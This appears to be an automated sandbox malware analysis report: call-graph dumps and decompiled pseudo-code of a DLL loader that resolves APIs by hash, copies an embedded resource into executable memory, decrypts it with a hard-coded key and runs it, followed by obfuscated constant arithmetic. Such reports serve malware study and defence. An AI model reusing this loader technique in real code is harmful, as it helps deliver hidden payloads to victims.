LeaveCriticalSection _doexit 45176->45181 45182 100440da 5 API calls __decode_pointer 45176->45182 45177->45168 45179->45176 45180->45176 45181->45176 45182->45176 45183->45118 45184->45121 45185->45112 45186->45117 45200 1003b4da 45187->45200 45189 10008afb 45190 10008b02 45189->45190 45191 1003b59d __getdrive 69 API calls 45189->45191 45190->44974 45192 10008b27 45191->45192 45192->44974 45228 10008de0 45193->45228 45195 10009daa 45195->44993 45196->44990 45197->44970 45198->44981 45199->44983 45201 1003b587 45200->45201 45213 1003b4e8 45200->45213 45226 100440da 5 API calls __decode_pointer 45201->45226 45203 1003b58d 45227 1003d47e 69 API calls __getptd_noexit 45203->45227 45206 1003b593 45206->45189 45209 1003b54b RtlAllocateHeap 45209->45213 45210 1003b4fd 45210->45213 45219 10044097 69 API calls 2 library calls 45210->45219 45220 10043ef7 69 API calls 7 library calls 45210->45220 45221 10040bdb GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 45210->45221 45212 1003b57e 45212->45189 45213->45209 45213->45210 45213->45212 45214 1003b572 45213->45214 45217 1003b570 45213->45217 45222 1003b48b 69 API calls 4 library calls 45213->45222 45223 100440da 5 API calls __decode_pointer 45213->45223 45224 1003d47e 69 API calls __getptd_noexit 45214->45224 45225 1003d47e 69 API calls __getptd_noexit 45217->45225 45219->45210 45220->45210 45222->45213 45223->45213 45224->45217 45225->45212 45226->45203 45227->45206 45230 10008e73 ___DllMainCRTStartup 45228->45230 45229 1000919f GetNativeSystemInfo 45231 1000925c ___DllMainCRTStartup 45229->45231 45230->45229 45233 10009513 45230->45233 45232 10009445 GetProcessHeap HeapAlloc 45231->45232 45231->45233 45232->45233 45235 10009579 ___DllMainCRTStartup 45232->45235 45233->45195 45234 10009adc ___DllMainCRTStartup 45244 10009b47 45234->45244 45255 100088f0 ??3@YAXPAX ??3@YAXPAX GetProcessHeap HeapFree 45234->45255 45235->45234 45237 1000973b memcpy 45235->45237 45245 100066c0 memset memcpy ___DllMainCRTStartup 
45237->45245 45238 10009b3a 45238->45195 45240 10009927 ___DllMainCRTStartup 45240->45234 45246 10007ae0 IsBadHugeReadPtr realloc IsBadHugeReadPtr 45240->45246 45242 10009a84 45242->45234 45247 10007030 45242->45247 45244->45195 45245->45240 45246->45242 45248 10007104 ___DllMainCRTStartup 45247->45248 45249 100072d9 45248->45249 45253 10007301 ___DllMainCRTStartup 45248->45253 45256 10006d80 45249->45256 45251 100072f0 45251->45234 45252 10006d80 ___DllMainCRTStartup VirtualProtect 45252->45253 45253->45252 45254 100075ba 45253->45254 45254->45234 45255->45238 45257 10006d93 45256->45257 45258 10006d9d 45256->45258 45257->45251 45259 10006fc9 VirtualProtect 45258->45259 45260 10006dc7 45258->45260 45259->45251 45260->45251 45261 1002d69c 45262 1002d6a8 __EH_prolog3 45261->45262 45264 1002d6f6 45262->45264 45272 1002d2c7 EnterCriticalSection 45262->45272 45286 1001729e 2 API calls 4 library calls 45262->45286 45287 1002d3d7 TlsAlloc InitializeCriticalSection 45262->45287 45288 1002d154 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 45264->45288 45266 1002d703 45269 1002d709 45266->45269 45270 1002d71c ~_Task_impl 45266->45270 45289 1002d479 90 API calls 4 library calls 45269->45289 45277 1002d2e6 45272->45277 45273 1002d3a2 _memset 45274 1002d3b6 LeaveCriticalSection 45273->45274 45274->45262 45275 1002d334 GlobalHandle GlobalUnlock 45279 10001710 ctype 82 API calls 45275->45279 45276 1002d31f 45290 10001710 45276->45290 45277->45273 45277->45275 45277->45276 45281 1002d351 GlobalReAlloc 45279->45281 45282 1002d35b 45281->45282 45283 1002d383 GlobalLock 45282->45283 45284 1002d366 GlobalHandle GlobalLock 45282->45284 45285 1002d374 LeaveCriticalSection 45282->45285 45283->45273 45284->45285 45285->45283 45286->45262 45287->45262 45288->45266 45289->45270 45291 1000171c 45290->45291 45292 1000172b GlobalAlloc 45291->45292 45294 10001000 82 API calls ctype 45291->45294 45292->45282

                                                                                                                Control-flow Graph

                                                                                                                C-Code - Quality: 60%
                                                                                                                			E10009DB0(void* __ebp, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v4;
                                                                                                                				short _v8;
                                                                                                                				short _v10;
                                                                                                                				short _v12;
                                                                                                                				short _v14;
                                                                                                                				short _v16;
                                                                                                                				short _v18;
                                                                                                                				short _v20;
                                                                                                                				short _v22;
                                                                                                                				short _v24;
                                                                                                                				short _v26;
                                                                                                                				short _v28;
                                                                                                                				short _v30;
                                                                                                                				char _v32;
                                                                                                                				short _v36;
                                                                                                                				short _v38;
                                                                                                                				short _v40;
                                                                                                                				short _v42;
                                                                                                                				short _v44;
                                                                                                                				short _v46;
                                                                                                                				short _v48;
                                                                                                                				short _v50;
                                                                                                                				short _v52;
                                                                                                                				short _v54;
                                                                                                                				char _v56;
                                                                                                                				short _v58;
                                                                                                                				short _v60;
                                                                                                                				short _v62;
                                                                                                                				short _v64;
                                                                                                                				short _v66;
                                                                                                                				short _v68;
                                                                                                                				short _v70;
                                                                                                                				short _v72;
                                                                                                                				short _v74;
                                                                                                                				char _v76;
                                                                                                                				void* _v80;
                                                                                                                				void* _v84;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t51;
                                                                                                                				struct HWND__* _t60;
                                                                                                                				struct HWND__* _t69;
                                                                                                                				void* _t71;
                                                                                                                				intOrPtr _t74;
                                                                                                                				intOrPtr _t75;
                                                                                                                				intOrPtr _t76;
                                                                                                                				intOrPtr _t77;
                                                                                                                				intOrPtr _t78;
                                                                                                                				intOrPtr _t79;
                                                                                                                				intOrPtr _t80;
                                                                                                                				intOrPtr _t81;
                                                                                                                				intOrPtr _t82;
                                                                                                                				intOrPtr _t83;
                                                                                                                				intOrPtr _t84;
                                                                                                                				intOrPtr _t85;
                                                                                                                				intOrPtr _t86;
                                                                                                                				intOrPtr _t87;
                                                                                                                				intOrPtr _t88;
                                                                                                                				intOrPtr _t89;
                                                                                                                				intOrPtr _t90;
                                                                                                                				intOrPtr _t91;
                                                                                                                				intOrPtr _t92;
                                                                                                                				intOrPtr _t93;
                                                                                                                				intOrPtr _t94;
                                                                                                                				intOrPtr _t95;
                                                                                                                				intOrPtr _t96;
                                                                                                                				struct HRSRC__* _t97;
                                                                                                                				int _t99;
                                                                                                                				void* _t100;
                                                                                                                				void* _t102;
                                                                                                                				intOrPtr _t106;
                                                                                                                				signed int _t111;
                                                                                                                				void* _t120;
                                                                                                                				void* _t121;
                                                                                                                				void* _t122;
                                                                                                                				struct HINSTANCE__* _t123;
                                                                                                                				signed int _t133;
                                                                                                                				intOrPtr* _t138;
                                                                                                                				int _t140;
                                                                                                                				void* _t141;
                                                                                                                				void* _t142;
                                                                                                                				struct HRSRC__* _t143;
                                                                                                                				void* _t144;
                                                                                                                				void* _t149;
                                                                                                                				signed int _t151;
                                                                                                                				signed int _t157;
                                                                                                                				void* _t161;
                                                                                                                
                                                                                                                				_t144 = __ebp;
                                                                                                                				_t157 =  &_v84;
                                                                                                                				_t51 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_v4 = _t51 ^ _t157;
                                                                                                                				_v84 = _a4;
                                                                                                                				if(_a8 != 1) {
                                                                                                                					L14:
                                                                                                                					return E1003B437(1, _t120, _v4 ^ _t157, _t135, 0, _t140);
                                                                                                                				} else {
                                                                                                                					_t141 = CreateWindowExW;
                                                                                                                					if(CreateWindowExW(0x3db, L"MainConsole", L"FormClass", 0x38, 0x156, 0x22b7, 0x7b, 0x379, 0, 0, 0, 0) == 0) {
                                                                                                                						GetLastError();
                                                                                                                					}
                                                                                                                					_t121 = ShowWindow;
                                                                                                                					ShowWindow(0, 0); // executed
                                                                                                                					_t60 = CreateWindowExA(0x298, "StartForme", "One Click", 0x60, 0x1bb, 0x1a11, 1, 0x379, 0, 0, 0, 0); // executed
                                                                                                                					_t164 = _t60;
                                                                                                                					if(_t60 != 0) {
                                                                                                                						ShowWindow(0, 0);
                                                                                                                					}
                                                                                                                					if(E10008AF0(_t121, _t141, _t164) != 0) {
                                                                                                                						E1003BE3F(_t121, _t135, 0, _t141, __eflags);
                                                                                                                						__eflags = 0;
                                                                                                                						return E1003B437(0, _t121, _v4 ^ _t157 + 0x00000004, _t135, 0, _t141, 0x10057acc);
                                                                                                                					} else {
                                                                                                                						_push(_t144);
                                                                                                                						_v30 = 0x65;
                                                                                                                						_v24 = 0x65;
                                                                                                                						_v26 = 0x6e;
                                                                                                                						_v76 = 0x6e;
                                                                                                                						 *0x1006c2bc = 0;
                                                                                                                						 *0x1006c2c0 = 0;
                                                                                                                						 *0x1006c2c4 = 0;
                                                                                                                						 *0x1006c2cc = 0;
                                                                                                                						 *0x1006c2c8 = 0;
                                                                                                                						 *0x1006c2d0 = 0;
                                                                                                                						 *0x1006c2d4 = 0;
                                                                                                                						_v32 = 0x6b;
                                                                                                                						_v28 = 0x72;
                                                                                                                						_v22 = 0x6c;
                                                                                                                						_v20 = 0x33;
                                                                                                                						_v18 = 0x32;
                                                                                                                						_v16 = 0x2e;
                                                                                                                						_v14 = 0x64;
                                                                                                                						_v12 = 0x6c;
                                                                                                                						_v10 = 0x6c;
                                                                                                                						_v8 = 0;
                                                                                                                						_v74 = 0x74;
                                                                                                                						_v72 = 0x64;
                                                                                                                						_v70 = 0x6c;
                                                                                                                						_v68 = 0x6c;
                                                                                                                						_v66 = 0x2e;
                                                                                                                						_v64 = 0x64;
                                                                                                                						_v62 = 0x6c;
                                                                                                                						_v60 = 0x6c;
                                                                                                                						_v58 = 0;
                                                                                                                						_v56 = 0x6d;
                                                                                                                						_v54 = 0x73;
                                                                                                                						_v52 = 0x76;
                                                                                                                						_v50 = 0x63;
                                                                                                                						_v48 = 0x72;
                                                                                                                						_v46 = 0x74;
                                                                                                                						_v44 = 0x2e;
                                                                                                                						_v42 = 0x64;
                                                                                                                						_v40 = 0x6c;
                                                                                                                						_v38 = 0x6c;
                                                                                                                						_v36 = 0;
                                                                                                                						if(CreateWindowExW(0x3db, L"MainConsole", L"FormClass", 0x38, 0x156, 0x22b7, 0x7b, 0x379, 0, 0, 0, 0) == 0) {
                                                                                                                							GetLastError();
                                                                                                                						}
                                                                                                                						ShowWindow(0, 0); // executed
                                                                                                                						_t69 = CreateWindowExA(0x298, "StartForme", "One Click", 0x60, 0x1bb, 0x1a11, 1, 0x379, 0, 0, 0, 0); // executed
                                                                                                                						if(_t69 != 0) {
                                                                                                                							ShowWindow(0, 0);
                                                                                                                						}
                                                                                                                						_t142 = E10005AE0( &_v32);
                                                                                                                						_t71 = E10005AE0( &_v76);
                                                                                                                						_t122 = E10005AE0( &_v56);
                                                                                                                						_push(0x1e0f99a8);
                                                                                                                						_push(_t122);
                                                                                                                						_t74 = E10005C60();
                                                                                                                						_push(0x1f5799a4);
                                                                                                                						_push(_t122);
                                                                                                                						 *0x1006effc = _t74;
                                                                                                                						_t75 = E10005C60();
                                                                                                                						_push(0x91bb8b03);
                                                                                                                						_push(_t122);
                                                                                                                						 *0x1006eff4 = _t75;
                                                                                                                						_t76 = E10005C60();
                                                                                                                						_push(0xac289a52);
                                                                                                                						_push(_t122);
                                                                                                                						 *0x1006eff8 = _t76;
                                                                                                                						_t77 = E10005C60();
                                                                                                                						_push(0x8b7db30);
                                                                                                                						_push(_t122);
                                                                                                                						 *0x1006eff0 = _t77;
                                                                                                                						_t78 = E10005C60();
                                                                                                                						_push(0x2017d77e);
                                                                                                                						_push(_t122);
                                                                                                                						 *0x1006efec = _t78;
                                                                                                                						_t79 = E10005C60();
                                                                                                                						_push(0x1fbfdb79);
                                                                                                                						_push(_t122);
                                                                                                                						 *0x1006efe8 = _t79;
                                                                                                                						_t80 = E10005C60();
                                                                                                                						_push(0x33c2345a);
                                                                                                                						_push(_t142);
                                                                                                                						 *0x1006efe4 = _t80;
                                                                                                                						_t81 = E10005C60();
                                                                                                                						_push(0x1a71cc9d);
                                                                                                                						_push(_t142);
                                                                                                                						 *0x1006f03c = _t81;
                                                                                                                						_t82 = E10005C60();
                                                                                                                						_push(0x45db32b0);
                                                                                                                						_push(_t142);
                                                                                                                						 *0x1006f038 = _t82;
                                                                                                                						_t83 = E10005C60();
                                                                                                                						_push(0xe5169db9);
                                                                                                                						_push(_t142);
                                                                                                                						 *0x1006f034 = _t83;
                                                                                                                						_t84 = E10005C60();
                                                                                                                						_push(0x1b972e21);
                                                                                                                						_push(_t142);
                                                                                                                						 *0x1006f030 = _t84;
                                                                                                                						_t85 = E10005C60();
                                                                                                                						_push(0x1e5e64b8);
                                                                                                                						_push(_t142);
                                                                                                                						 *0x1006f02c = _t85;
                                                                                                                						_t86 = E10005C60();
                                                                                                                						_push(0xf05a3fad);
                                                                                                                						_push(_t142);
                                                                                                                						 *0x1006f028 = _t86;
                                                                                                                						_t87 = E10005C60();
                                                                                                                						_push(0xaedc0763);
                                                                                                                						_push(_t142);
                                                                                                                						 *0x1006f024 = _t87;
                                                                                                                						_t88 = E10005C60();
                                                                                                                						_push(0x10298d2c);
                                                                                                                						_push(_t71);
                                                                                                                						 *0x1006f020 = _t88;
                                                                                                                						_t89 = E10005C60();
                                                                                                                						_push(0x12d49424);
                                                                                                                						_push(_t142);
                                                                                                                						 *0x1006f01c = _t89;
                                                                                                                						_t90 = E10005C60();
                                                                                                                						_push(0x89df54bc);
                                                                                                                						_push(_t142);
                                                                                                                						 *0x1006f018 = _t90;
                                                                                                                						_t91 = E10005C60();
                                                                                                                						_push(0x1113b348);
                                                                                                                						_push(_t142);
                                                                                                                						 *0x1006f014 = _t91;
                                                                                                                						_t92 = E10005C60();
                                                                                                                						_push(0x8e1ebcb4);
                                                                                                                						_push(_t142);
                                                                                                                						 *0x1006f010 = _t92;
                                                                                                                						_t93 = E10005C60();
                                                                                                                						_push(0xfda10490);
                                                                                                                						_push(_t142);
                                                                                                                						 *0x1006f00c = _t93;
                                                                                                                						_t94 = E10005C60();
                                                                                                                						_push(0x355e8d81);
                                                                                                                						_push(_t142);
                                                                                                                						 *0x1006f008 = _t94;
                                                                                                                						_t95 = E10005C60();
                                                                                                                						_push(0xe0fb020e);
                                                                                                                						_push(_t142);
                                                                                                                						 *0x1006f004 = _t95;
                                                                                                                						_t96 = E10005C60();
                                                                                                                						_t123 = _v84;
                                                                                                                						_t161 = _t157 + 0xc4;
                                                                                                                						 *0x1006f000 = _t96; // executed
                                                                                                                						_t97 = FindResourceW(_t123, 0x323, 0x10057af0); // executed
                                                                                                                						_t143 = _t97;
                                                                                                                						_v80 = LoadResource(_t123, _t143);
                                                                                                                						_t99 = SizeofResource(_t123, _t143);
                                                                                                                						_t138 =  *0x1006f038;
                                                                                                                						_t140 = _t99;
                                                                                                                						if(_t138 == 0) {
                                                                                                                							_t100 = VirtualAlloc(0, _t140, 0x3000, 0x40);
                                                                                                                						} else {
                                                                                                                							_t133 =  *0x1006c2c0; // 0x0
                                                                                                                							_t151 =  *0x1006c2cc; // 0x0
                                                                                                                							_t111 =  *0x1006c2c8; // 0x0
                                                                                                                							_t45 = ((1 - _t133) *  *0x1006c2cc + (_t151 - _t111 -  *0x1006c2bc) * _t111 +  *0x1006c2d0 + (3 - _t133 * _t133) *  *0x1006c2c4) * 2; // 0x41
                                                                                                                							_t100 =  *_t138(0xffffffff, 0, _t140, 0x3000, (1 - _t133) *  *0x1006c2cc + (_t151 - _t111 -  *0x1006c2bc) * _t111 +  *0x1006c2d0 + (3 - _t133 * _t133) *  *0x1006c2c4 + _t45 + 0x40, 0);
                                                                                                                						}
                                                                                                                						_t135 = _v80;
                                                                                                                						_t120 = _t100;
                                                                                                                						memcpy(_t120, _v80, _t140);
                                                                                                                						_t102 = malloc(0x2d0);
                                                                                                                						_t149 = _t102;
                                                                                                                						E10006020();
                                                                                                                						E10006370();
                                                                                                                						 *0x1006eff8(_t149, _t149, _t120, _t140, _t149, "Sf&zWTW#0&KS&HyX#7fFHDrtUBt)GjeI+98ErdEK$gdK#R", 0x2f);
                                                                                                                						_t106 = E10009D80(_t120, _t140);
                                                                                                                						_t157 = _t161 + 0x34;
                                                                                                                						 *0x1006f044 = _t106;
                                                                                                                						 *0x1006f040(_v84, 1, 0);
                                                                                                                						goto L14;
                                                                                                                					}
                                                                                                                				}
                                                                                                                 			}
                                                                                                                0x1000a0d1
                                                                                                                0x1000a0d6
                                                                                                                0x1000a0d7
                                                                                                                0x1000a0dc
                                                                                                                0x1000a0e1
                                                                                                                0x1000a0e6
                                                                                                                0x1000a0e7
                                                                                                                0x1000a0ec
                                                                                                                0x1000a0f4
                                                                                                                0x1000a0f9
                                                                                                                0x1000a0fa
                                                                                                                0x1000a0ff
                                                                                                                0x1000a104
                                                                                                                0x1000a109
                                                                                                                0x1000a10a
                                                                                                                0x1000a10f
                                                                                                                0x1000a114
                                                                                                                0x1000a119
                                                                                                                0x1000a11a
                                                                                                                0x1000a11f
                                                                                                                0x1000a124
                                                                                                                0x1000a129
                                                                                                                0x1000a12a
                                                                                                                0x1000a12f
                                                                                                                0x1000a134
                                                                                                                0x1000a139
                                                                                                                0x1000a13a
                                                                                                                0x1000a13f
                                                                                                                0x1000a144
                                                                                                                0x1000a149
                                                                                                                0x1000a14a
                                                                                                                0x1000a14f
                                                                                                                0x1000a156
                                                                                                                0x1000a15b
                                                                                                                0x1000a15c
                                                                                                                0x1000a162
                                                                                                                0x1000a167
                                                                                                                0x1000a16c
                                                                                                                0x1000a16d
                                                                                                                0x1000a172
                                                                                                                0x1000a177
                                                                                                                0x1000a17b
                                                                                                                0x1000a189
                                                                                                                0x1000a18e
                                                                                                                0x1000a190
                                                                                                                0x1000a19c
                                                                                                                0x1000a1a0
                                                                                                                0x1000a1a6
                                                                                                                0x1000a1ae
                                                                                                                0x1000a1b0
                                                                                                                0x1000a215
                                                                                                                0x1000a1b2
                                                                                                                0x1000a1b2
                                                                                                                0x1000a1b8
                                                                                                                0x1000a1ca
                                                                                                                0x1000a1fa
                                                                                                                0x1000a208
                                                                                                                0x1000a208
                                                                                                                0x1000a21b
                                                                                                                0x1000a220
                                                                                                                0x1000a224
                                                                                                                0x1000a22f
                                                                                                                0x1000a237
                                                                                                                0x1000a23f
                                                                                                                0x1000a247
                                                                                                                0x1000a24d
                                                                                                                0x1000a255
                                                                                                                0x1000a25a
                                                                                                                0x1000a25e
                                                                                                                0x1000a26a
                                                                                                                0x00000000
                                                                                                                0x1000a270
                                                                                                                0x10009e55

                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32 ref: 10009E04
                                                                                                                • GetLastError.KERNEL32(?,?,00000001), ref: 10009E0A
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 10009E18
                                                                                                                • CreateWindowExA.USER32 ref: 10009E40
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 10009E4C
                                                                                                                • CreateWindowExW.USER32 ref: 10009F9B
                                                                                                                • GetLastError.KERNEL32 ref: 10009FA1
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 10009FA9
                                                                                                                • CreateWindowExA.USER32 ref: 10009FD1
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 10009FDD
                                                                                                                • FindResourceW.KERNEL32(?,00000323,10057AF0), ref: 1000A18E
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 1000A194
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 1000A1A0
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 1000A215
                                                                                                                • memcpy.MSVCRT ref: 1000A224
                                                                                                                • malloc.MSVCRT ref: 1000A22F
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 1000A24D
                                                                                                                • _printf.LIBCMT ref: 1000A28F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CreateShow$Resource$ErrorLast$??3@AllocFindLoadSizeofVirtual_printfmallocmemcpy
                                                                                                                • String ID: 2$3$FormClass$MainConsole$One Click$Sf&zWTW#0&KS&HyX#7fFHDrtUBt)GjeI+98ErdEK$gdK#R$StartForme$c$k$m$r$r$s$v
                                                                                                                • API String ID: 3994317079-1836535338
                                                                                                                • Opcode ID: 4a3e9dbd5743d56e720101978c5c463fd20b91b65e557ebcd9c306c806cd55f8
                                                                                                                • Instruction ID: b0106599c515f6b93cebefedc9fe1fed015a17e80c2994035335cc9516bd7a3f
                                                                                                                • Opcode Fuzzy Hash: 4a3e9dbd5743d56e720101978c5c463fd20b91b65e557ebcd9c306c806cd55f8
                                                                                                                • Instruction Fuzzy Hash: FFC1A074A08354AAF310DBB58CC9E5B7AE9FF99740F40041EF644E7262E7F5A5008B6A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001A50CF() {
                                                                                                                				char _v44;
                                                                                                                				signed int _v48;
                                                                                                                				char _v76;
                                                                                                                				signed int _v100;
                                                                                                                				signed int _v112;
                                                                                                                				intOrPtr _v132;
                                                                                                                				signed int _v136;
                                                                                                                				char _v144;
                                                                                                                				signed int _v152;
                                                                                                                				intOrPtr _v156;
                                                                                                                				signed int _v160;
                                                                                                                				char _v172;
                                                                                                                				char _v180;
                                                                                                                				char _v188;
                                                                                                                				char _v192;
                                                                                                                				void* _v196;
                                                                                                                				char _v200;
                                                                                                                				char _v204;
                                                                                                                				signed int _v208;
                                                                                                                				signed int _v212;
                                                                                                                				signed int _v216;
                                                                                                                				signed int _v220;
                                                                                                                				signed int _v224;
                                                                                                                				signed int _v228;
                                                                                                                				signed int _v232;
                                                                                                                				signed int _v236;
                                                                                                                				signed int _v240;
                                                                                                                				signed int _v244;
                                                                                                                				signed int _v248;
                                                                                                                				signed int _v252;
                                                                                                                				signed int _v256;
                                                                                                                				signed int _v260;
                                                                                                                				signed int _v264;
                                                                                                                				signed int _v268;
                                                                                                                				signed int _v272;
                                                                                                                				signed int _v276;
                                                                                                                				signed int _v280;
                                                                                                                				signed int _v284;
                                                                                                                				signed int _v288;
                                                                                                                				signed int _v292;
                                                                                                                				signed int _v296;
                                                                                                                				signed int _v300;
                                                                                                                				signed int _v304;
                                                                                                                				signed int _v308;
                                                                                                                				signed int _v312;
                                                                                                                				signed int _v316;
                                                                                                                				signed int _v320;
                                                                                                                				signed int _v324;
                                                                                                                				signed int _v328;
                                                                                                                				signed int _v332;
                                                                                                                				signed int _v336;
                                                                                                                				signed int _v340;
                                                                                                                				signed int _v344;
                                                                                                                				signed int _v348;
                                                                                                                				signed int _v352;
                                                                                                                				signed int _v356;
                                                                                                                				signed int _v360;
                                                                                                                				signed int _v364;
                                                                                                                				signed int _v368;
                                                                                                                				signed int _v372;
                                                                                                                				signed int _v376;
                                                                                                                				signed int _v380;
                                                                                                                				signed int _v384;
                                                                                                                				signed int _v388;
                                                                                                                				signed int _v392;
                                                                                                                				signed int _v396;
                                                                                                                				signed int _v400;
                                                                                                                				unsigned int _v404;
                                                                                                                				signed int _v408;
                                                                                                                				unsigned int _v412;
                                                                                                                				signed int _v416;
                                                                                                                				signed int _v420;
                                                                                                                				signed int _v424;
                                                                                                                				signed int _v428;
                                                                                                                				signed int _v432;
                                                                                                                				signed int _v436;
                                                                                                                				signed int _v440;
                                                                                                                				signed int _v444;
                                                                                                                				signed int _v448;
                                                                                                                				signed int _v452;
                                                                                                                				signed int _v456;
                                                                                                                				unsigned int _v460;
                                                                                                                				signed int _v464;
                                                                                                                				signed int _v468;
                                                                                                                				signed int _v472;
                                                                                                                				signed int _v476;
                                                                                                                				signed int _v480;
                                                                                                                				unsigned int _v484;
                                                                                                                				unsigned int _v488;
                                                                                                                				signed int _v492;
                                                                                                                				signed int _v496;
                                                                                                                				signed int _v500;
                                                                                                                				signed int _v504;
                                                                                                                				signed int _v508;
                                                                                                                				unsigned int _v512;
                                                                                                                				signed int _v516;
                                                                                                                				signed int _v520;
                                                                                                                				signed int _v524;
                                                                                                                				signed int _v528;
                                                                                                                				signed int _v532;
                                                                                                                				signed int _v536;
                                                                                                                				signed int _v540;
                                                                                                                				signed int _v544;
                                                                                                                				signed int _v548;
                                                                                                                				signed int _v552;
                                                                                                                				signed int _v556;
                                                                                                                				signed int _v560;
                                                                                                                				signed int _v564;
                                                                                                                				signed int _v568;
                                                                                                                				signed int _v572;
                                                                                                                				unsigned int _v576;
                                                                                                                				signed int _v580;
                                                                                                                				signed int _v584;
                                                                                                                				signed int _v588;
                                                                                                                				signed int _v592;
                                                                                                                				signed int _v596;
                                                                                                                				signed int _v600;
                                                                                                                				signed int _v604;
                                                                                                                				signed int _v608;
                                                                                                                				signed int _v612;
                                                                                                                				signed int _v616;
                                                                                                                				signed int _v620;
                                                                                                                				signed int _v624;
                                                                                                                				signed int _v628;
                                                                                                                				signed int _v632;
                                                                                                                				signed int _v636;
                                                                                                                				signed int _v640;
                                                                                                                				signed int _v644;
                                                                                                                				signed int _v648;
                                                                                                                				signed int _v652;
                                                                                                                				signed int _v656;
                                                                                                                				signed int _v660;
                                                                                                                				signed int _v664;
                                                                                                                				void* __ebx;
                                                                                                                				signed int _t1143;
                                                                                                                				signed int _t1144;
                                                                                                                				void* _t1172;
                                                                                                                				signed int _t1179;
                                                                                                                				signed int _t1199;
                                                                                                                				signed int _t1214;
                                                                                                                				signed int _t1216;
                                                                                                                				signed int _t1217;
                                                                                                                				signed int _t1218;
                                                                                                                				signed int _t1219;
                                                                                                                				signed int _t1220;
                                                                                                                				signed int _t1221;
                                                                                                                				signed int _t1222;
                                                                                                                				signed int _t1223;
                                                                                                                				signed int _t1224;
                                                                                                                				signed int _t1225;
                                                                                                                				signed int _t1226;
                                                                                                                				signed int _t1227;
                                                                                                                				signed int _t1228;
                                                                                                                				signed int _t1229;
                                                                                                                				signed int _t1230;
                                                                                                                				signed int _t1231;
                                                                                                                				signed int _t1232;
                                                                                                                				signed int _t1233;
                                                                                                                				signed int _t1234;
                                                                                                                				signed int _t1235;
                                                                                                                				signed int _t1236;
                                                                                                                				signed int _t1237;
                                                                                                                				signed int _t1238;
                                                                                                                				signed int _t1239;
                                                                                                                				signed int _t1240;
                                                                                                                				signed int _t1241;
                                                                                                                				signed int _t1331;
                                                                                                                				signed int _t1335;
                                                                                                                				signed int _t1337;
                                                                                                                				signed int _t1347;
                                                                                                                				signed int _t1365;
                                                                                                                				void* _t1367;
                                                                                                                				void* _t1372;
                                                                                                                				void* _t1373;
                                                                                                                				void* _t1374;
                                                                                                                
                                                                                                                				_t1367 = (_t1365 & 0xfffffff8) - 0x298;
                                                                                                                				_v592 = 0xf1522c;
                                                                                                                				_v592 = _v592 + 0x5519;
                                                                                                                				_v592 = _v592 | 0xcd6e1983;
                                                                                                                				_t1216 = 0x18;
                                                                                                                				_v592 = _v592 / _t1216;
                                                                                                                				_v592 = _v592 ^ 0x089553aa;
                                                                                                                				_t1337 = 0xc05109e;
                                                                                                                				_v500 = 0xd6a5c3;
                                                                                                                				_v500 = _v500 + 0x75d9;
                                                                                                                				_v500 = _v500 | 0x9ecacc8d;
                                                                                                                				_v500 = _v500 ^ 0x9edfdf9d;
                                                                                                                				_v656 = 0xf69dad;
                                                                                                                				_v656 = _v656 | 0xb869f2cc;
                                                                                                                				_v656 = _v656 + 0xffffb28d;
                                                                                                                				_v656 = _v656 + 0xffff4715;
                                                                                                                				_v656 = _v656 ^ 0xb8fef98f;
                                                                                                                				_v496 = 0xa5a9c3;
                                                                                                                				_v496 = _v496 ^ 0x2b8b90b5;
                                                                                                                				_v496 = _v496 << 0xf;
                                                                                                                				_v496 = _v496 ^ 0x1cbd4932;
                                                                                                                				_v460 = 0xf5f5ec;
                                                                                                                				_v460 = _v460 >> 3;
                                                                                                                				_v460 = _v460 ^ 0x001187d3;
                                                                                                                				_v272 = 0x98bae1;
                                                                                                                				_v272 = _v272 + 0xffffb54e;
                                                                                                                				_v272 = _v272 ^ 0x009d02e0;
                                                                                                                				_v216 = 0xc5bb0a;
                                                                                                                				_v216 = _v216 + 0xbed4;
                                                                                                                				_v216 = _v216 ^ 0x00c7d8e5;
                                                                                                                				_v576 = 0x4661d5;
                                                                                                                				_v576 = _v576 >> 7;
                                                                                                                				_v576 = _v576 | 0x343f7c51;
                                                                                                                				_v576 = _v576 >> 3;
                                                                                                                				_v576 = _v576 ^ 0x0684147d;
                                                                                                                				_v224 = 0x34e6cb;
                                                                                                                				_v224 = _v224 << 0xf;
                                                                                                                				_v224 = _v224 ^ 0x736024c3;
                                                                                                                				_v228 = 0xbb63c0;
                                                                                                                				_t1217 = 5;
                                                                                                                				_v228 = _v228 / _t1217;
                                                                                                                				_v228 = _v228 ^ 0x002b9430;
                                                                                                                				_v476 = 0x31e456;
                                                                                                                				_v476 = _v476 >> 0xd;
                                                                                                                				_v476 = _v476 ^ 0x61454e78;
                                                                                                                				_v476 = _v476 ^ 0x614eb02e;
                                                                                                                				_v412 = 0x4070b2;
                                                                                                                				_v412 = _v412 * 0x16;
